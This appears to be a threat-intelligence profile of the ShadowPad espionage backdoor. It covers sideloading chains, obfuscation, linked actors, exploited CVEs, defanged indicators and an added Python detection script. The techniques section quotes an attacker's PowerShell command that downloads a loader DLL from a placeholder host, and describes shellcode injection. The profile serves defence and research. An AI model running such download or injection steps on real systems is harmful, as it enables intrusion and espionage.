ShadowPad
ShadowPad is a privately developed, actively maintained modular remote access toolkit/backdoor widely associated with China-aligned espionage activity. The content states it first emerged around 2015 and has been used by numerous distinct threat actors, including groups and clusters such as RedFoxtrot, Tonto Team, FishMonger, Earth Lusca, FamousSparrow, and activity linked with Winnti-related operations. It has also been described as POISONPLUG.SHADOW, with Kaspersky credited in the content for introducing the ShadowPad family name.
Its observed role is long-term post-compromise access and espionage. Reported capabilities and behaviors in the content include collecting the victim system username, communicating over HTTP to retrieve and decode a command-and-control URL, and operating as a modular framework delivered through loaders and sideloading chains. ShadowPad is repeatedly described as being deployed after initial compromise to maintain persistence and support follow-on intrusion activity.
The content highlights extensive use of DLL sideloading and loader-based execution. Reported examples include side-loading via legitimate Bitdefender Crash Handler BDReinit.exe with log.dll and log.dll.dat; use of a renamed Microsoft Office IME executable to sideload imjpp14.dll before injecting the decrypted payload into wmplayer.exe; and deployment through older Bitdefender binaries where the loader copied itself to C:\ProgramData\OfficeDriver\svchost.exe, installed as a service, spawned wmplayer.exe and dllhost.exe, encrypted payload data into the registry, and later executed shellcode from RWX memory. Additional reporting in the content describes ShadowPad-related sideloading through legitimate software from security vendors and use in repeated DLL search order hijacking campaigns.
The malware is also notable for advanced protection and evasion. POISONPLUG.SHADOW/ShadowPad is described as protected by the custom ScatterBrain obfuscating compiler, which uses multiple protection modes, control-flow obfuscation, instruction mutation, and complete import protection to hinder static and dynamic analysis. The content also notes variants and loaders that inject into legitimate processes and store encrypted payloads in the registry.
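As an added example (not code from the page or from any vendor cited on it), the following Python turns the loader behaviours described in the two paragraphs above into detection heuristics run over constructed Sysmon-style telemetry; the event field names, the sample events and the placeholder CLSID are assumptions, not real indicators.

```python
import re

# Sideloaded DLL names from the reporting above; the only legitimate
# svchost.exe locations; and directories a loader can drop files into.
SIDELOAD_DLLS = {"log.dll", "imjpp14.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE = ("c:\\programdata\\", "c:\\users\\", "c:\\windows\\temp\\")
# CLSID subkey under WOW6432Node used to stage encrypted payload data.
CLSID_KEY_RE = re.compile(r"\\software\\classes\\wow6432node\\clsid\\?\{[^}]+\}", re.I)

def _dirname(path):
    """Lower-cased directory of a Windows path, with trailing backslash."""
    return path.lower().rsplit("\\", 1)[0] + "\\"

def check_event(ev):
    """Return (rule, detail) findings for one event; empty list if benign."""
    findings = []
    if ev["type"] == "image_load":
        dll = ev["image"].lower()
        # Host binary loading a known sideload DLL from its own user-writable
        # directory (the BDReinit.exe / log.dll pattern).
        if (dll.rsplit("\\", 1)[-1] in SIDELOAD_DLLS
                and _dirname(dll) == _dirname(ev["process"])
                and _dirname(dll).startswith(USER_WRITABLE)):
            findings.append(("sideload", f"{ev['process']} loaded {ev['image']}"))
    elif ev["type"] == "process_create":
        img, parent = ev["image"].lower(), ev.get("parent", "").lower()
        # svchost.exe masquerade: service host image outside System32/SysWOW64.
        if img.endswith("\\svchost.exe") and not img.startswith(SYSTEM_DIRS):
            findings.append(("svchost_masquerade", ev["image"]))
        # wmplayer.exe / dllhost.exe injection hosts spawned by a parent that
        # itself runs out of a user-writable directory.
        if (img.rsplit("\\", 1)[-1] in ("wmplayer.exe", "dllhost.exe")
                and parent.startswith(USER_WRITABLE)):
            findings.append(("injection_host", f"{ev['parent']} -> {ev['image']}"))
    elif ev["type"] == "registry_set":
        # Large binary value under a CLSID key: encrypted payload staging.
        if CLSID_KEY_RE.search(ev["key"]) and ev.get("value_size", 0) > 4096:
            findings.append(("registry_payload", ev["key"]))
    return findings

def scan(events):
    """Run every event through check_event and flatten the findings."""
    return [f for ev in events for f in check_event(ev)]

# Constructed sample telemetry (not real indicators) mirroring the reported chain.
SAMPLE_EVENTS = [
    {"type": "image_load", "process": "C:\\ProgramData\\BDReinit.exe", "image": "C:\\ProgramData\\log.dll"},
    {"type": "process_create", "image": "C:\\ProgramData\\OfficeDriver\\svchost.exe", "parent": "C:\\Windows\\System32\\services.exe"},
    {"type": "process_create", "image": "C:\\Program Files\\Windows Media Player\\wmplayer.exe", "parent": "C:\\ProgramData\\OfficeDriver\\svchost.exe"},
    {"type": "process_create", "image": "C:\\Windows\\System32\\svchost.exe", "parent": "C:\\Windows\\System32\\services.exe"},  # benign control
    {"type": "registry_set", "value_size": 120000,  # placeholder GUID, not the real key
     "key": "HKLM\\SOFTWARE\\Classes\\WOW6432Node\\CLSID\\{00000000-0000-0000-0000-000000000000}\\D752E7A8"},
]
```

Each heuristic on its own will produce false positives in some estates (e.g. legitimate software that stores binary blobs under CLSID keys), so in practice the rules are most useful correlated on one host within a short window.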
ShadowPad has been observed across a broad set of espionage campaigns and sectors. Reported targeting includes government entities, foreign affairs ministries, telecommunications providers, NGOs, think tanks, Catholic organizations, research institutes, and a financial-sector trade group, with victims spanning Asia, Central Asia, Southeast Asia, the United States, Mexico, Honduras, Pakistan, Taiwan, Thailand, Hungary, Turkey, France, and Afghanistan. In the content, it is repeatedly tied to Chinese state-aligned or contractor-linked operations, including references to I-SOON/FishMonger and Chengdu404-related activity.
The content also links ShadowPad to additional malware ecosystems and delivery chains. It is listed alongside tools such as PlugX, Spyder, SodaMaster, FunnySwitch, BIOPASS RAT, SprySOCKS, Cobalt Strike, and Linux Winnti. Cisco Talos reporting in the content states that the DKnife adversary-in-the-middle framework delivered ShadowPad and DarkNimbus by hijacking Windows binary downloads and Android application updates. Orange Cyberdefense CERT reporting cited in the content says ShadowPad and PlugX were used to distribute NailaoLocker in exploitation tied to CVE-2024-24919.
High-confidence indicators and artifacts directly mentioned in the content include C2 or infrastructure references such as api.googleauthenticatoronline[.]com (resolving to 213.59.118[.]124) and 216.238.106[.]150, and registry storage under HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID{1845df8d-241a-a0e4-02ea341a79878897}\D752E7A8. Related file and path artifacts include log.dll, log.dll.dat, BDReinit.exe, imjpp14.dll, C:\ProgramData\OfficeDriver\svchost.exe, and wmplayer.exe. The content also notes ShadowPad samples delivered by DKnife were signed with certificates issued to 四川奇雨网络科技有限公司 in Chengdu, Sichuan, China.
Vulnerabilities exploited
19 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
In May 2024, CVE-2024-24919, an information disclosure vulnerability in Check Point Quantum Security Gateways was exploited in the wild and tied to NailaoLocker ransomware (distributed via ShadowPad and PlugX backdoors, as documented by Orange Cyberdefense CERT).
Once access was established, SHADOW-EARTH-053 deployed ShadowPad, a modular malware family historically associated with multiple China-aligned intrusion sets, including APT41. The group relied heavily on DLL sideloading techniques involving signed legitimate executables.
ShadowPad is a modular remote access Trojan (RAT) that is closely associated with China-based APT groups. Because of its modular nature, ShadowPad can be continuously updated with new functionalities.
Among our finds on the server were utilities for lateral movement... The server had the following utilities: Utilities to check for and exploit vulnerability MS17-010... The hackers tweaked the functionality of the MS17-010 utility by adding the ability to check an entire subnet.
In their latest campaign, the actor leverages one of the latest WinRAR vulnerabilities that will ultimately lead to running shellcode... Rule names: EE_Loader, EE_Dropper, WinRAR_ADS_Traversal. References / Resources: WinRAR CVE: https://nvd.nist.gov/vuln/detail/CVE-2025-8088
The malware payloads seen in campaigns investigated by Microsoft Defender vary from remote access trojans (RATs) like VShell and EtherRAT, the SNOWLIGHT memory-based malware downloader that enabled attackers to deploy more payloads to target environments, ShadowPAD, and XMRig cryptominers. | CVE-2025-55182 (also referred to as React2Shell and includes CVE-2025-66478, which was merged into it) is a critical pre-authentication remote code execution (RCE) vulnerability affecting React Server Components, Next.js, and related frameworks.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a flaw in TrueConf Client, tracked as CVE-2026-3502 (CVSS score of 7.8), to its Known Exploited Vulnerabilities (KEV) catalog. CVE-2026-3502 is a flaw in TrueConf Client that allows it to download and install updates without verifying them. Attackers who can tamper with the update source can deliver malicious files, leading to arbitrary code execution on the system.
NetSarang Xmanager Enterprise 5.0 Build 1232, Xmanager 5.0 Build 1045, Xshell 5.0 Build 1322, Xftp 5.0 Build 1218, and Xlpd 5.0 Build 1220 contain a malicious nssock2.dll that implements a multi-stage, DNS-based backdoor. | References include https://securelist.com/shadowpad-in-corporate-networks/81432/ and a Kaspersky press release about 'ShadowPad attackers' hiding a backdoor in software used by hundreds of large companies worldwide. The description states the malicious nssock2.dll implements a multi-stage, DNS-based backdoor.
They also took advantage of specific software weaknesses, such as CVE-2024-8963 and CVE-2024-8190, sometimes even exploiting them before these vulnerabilities were publicly disclosed. | A key piece of malicious software was ShadowPad, described as a “closed-source modular backdoor platform” often used by these Chinese-linked groups to spy and gain remote access.
“We also discovered that APT41 created a tailored loader to inject a proof-of-concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation.” / “During the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn …”
...the source of their infection turned out to be an Exchange mail server, which had been compromised back in the summer of 2024 through exploitation of the ProxyShell vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
...ShadowPad Malware Actively Exploits WSUS Vulnerability... exploiting CVE-2025-59287 for initial access...
...exploited a public-facing Citrix NetScaler Gateway appliance, likely CVE-2023-3519, for initial access and deployed SnappyBee (also known as Deed RAT)... CVE-2023-3519 is a critical remote code execution (RCE) vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway appliances.
Groups observed using it
31 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
The privately developed ShadowPad backdoor was sold to multiple suspected PLA units, including RedFoxtrot and Tonto Team, and shared with entities like Chengdu404, whose staff were charged for activity attributed to APT41.
Their toolkit includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, and the BIOPASS RAT, and expanding SprySOCKS to Windows clearly shows continued investment in offensive capability.
Operators used implants – such as ShadowPad, SodaMaster, and Spyder – that are common or exclusive to China-aligned threat actors.
This campaign is also the first documented time FamousSparrow used ShadowPad, a privately sold backdoor... The final payloads were SparrowDoor and ShadowPad.
This includes an unreported cluster dubbed SteppeDriver that was first discovered in 2024 and has since targeted entities in France, Mongolia, and South America using tools like ShadowPad, COOLCLIENT, CurlyDoor, RudeGull, and MKTDownloader.
Techniques & procedures
37 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (5 techniques)
These private players supply everything from malware and network infrastructure to raw stolen data, turning cyber espionage into a marketplace.
Initial Access (2 techniques)
Execution (7 techniques)
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
ESET's experts found that the China-aligned cyberespionage outfit has hit its targets with two previously undocumented versions of their flagship backdoor called SparrowDoor. Importantly, the group was also observed using the ShadowPad backdoor for the first time.
At Victim D, the loader was downloaded using the following PowerShell command: powershell (new-object System.Net.WebClient).DownloadFile("http://<victim’s_web_server_IP_address>/Images/menu/log.dll";"c:\users\public\log.dll")
At Victim D, the attackers gained access to an admin console and used it to deploy implants on other machines in the local network.
This functionality is achieved by utilizing the Windows native functions NtAllocateVirtualMemory and NtCreateThreadEx... The sample will allocate an RWX-protected memory region using the VirtualAlloc Windows API, then write the shellcode to the memory region and pass execution to it.
Persistence (3 techniques)
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
Privilege Escalation (4 techniques)
Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.
Another command, ID 0x43, is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process... using NtAllocateVirtualMemory and NtCreateThreadEx... Once log.dll is loaded, it will spawn Microsoft Windows Media Player (wmplayer.exe) and dllhost.exe, injecting into them.
Stealth (11 techniques)
DOORME XOR-encrypts strings to evade detection... The malware employs a technique that can cause disassemblers to incorrectly split functions... The malware in question also employs a technique known as Control Flow Obfuscation... Dynamic import table resolution... log.dll incorporates a code-scattering obfuscation technique to frustrate static analysis.
ScatterBrain is a sophisticated obfuscating compiler that integrates multiple operational modes and protection components to significantly complicate the analysis of the binaries it generates.
Complete Import Protection: ScatterBrain employs a complete protection of a binary's import table, making it extremely difficult to understand how the binary interacts with the underlying operating system.
DOORME first resolves the address of LoadLibraryA and GetProcAddress Windows API by parsing the kernel32.dll module export table... The sample uses the common Ldr crawling technique to find the address of kernel32.dll... It uses GetProcAddress to resolve imports as needed.
Selective or Full Control Flow Graph (CFG) Obfuscation: This technique restructures the program's control flow, making it very difficult to analyze and create detection rules for.
Another command, ID 0x43, is particularly noteworthy as it allows the attacker to execute shellcode in the memory of the same process... using NtAllocateVirtualMemory and NtCreateThreadEx... Once log.dll is loaded, it will spawn Microsoft Windows Media Player (wmplayer.exe) and dllhost.exe, injecting into them.
Finally, the decrypted payload is injected into a wmplayer.exe process (Windows Media Player).
The content repeatedly describes malware and threat actors decoding, decrypting, deobfuscating, or unpacking payloads, strings, configuration data, commands, and C2 responses prior to execution or use.
The REF2924 intrusion set, using SIESTAGRAPH, DOORME, SHADOWPAD, and the system binary proxy execution technique (among others) represents an attack group...
Defense Impairment (1 technique)
Credential Access (1 technique)
Discovery (6 techniques)
ShadowPad is capable of gathering host information, executing commands, interacting with the file system and registry, and deploying new modules.
The content repeatedly describes malware and threat actors using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, nbtstat, netsh, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, domains, and network adapter/interface details.
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
Lateral Movement (2 techniques)
Collection (1 technique)
Command and Control (4 techniques)
Hunting C2/Adversaries Infrastructure with Shodan and Censys ... My research: Cobalt Strike C2, Metasploit/MSF, Covenant C2, Deimos C2, Posh C2, Brute Ratel C4, Mythic C2, Sliver C2 ... Night Hawk C2, NimPlant C2, ShadowPad C2 Infrastructure, Async Rat C2 Infrastructure, Meterpreter C2 Infrastructure
IOCs tracked for this family
189 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
190 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A privately developed backdoor commercialized and sold to multiple Chinese-linked entities and suspected PLA units for cyber espionage operations.
Named as part of FishMonger’s toolkit.
FishMonger’s toolset includes ShadowPad, Spyder, Cobalt Strike, FunnySwitch, SprySOCKS, and the BIOPASS RAT.
A backdoor referenced as part of malware distribution associated with ransomware activity.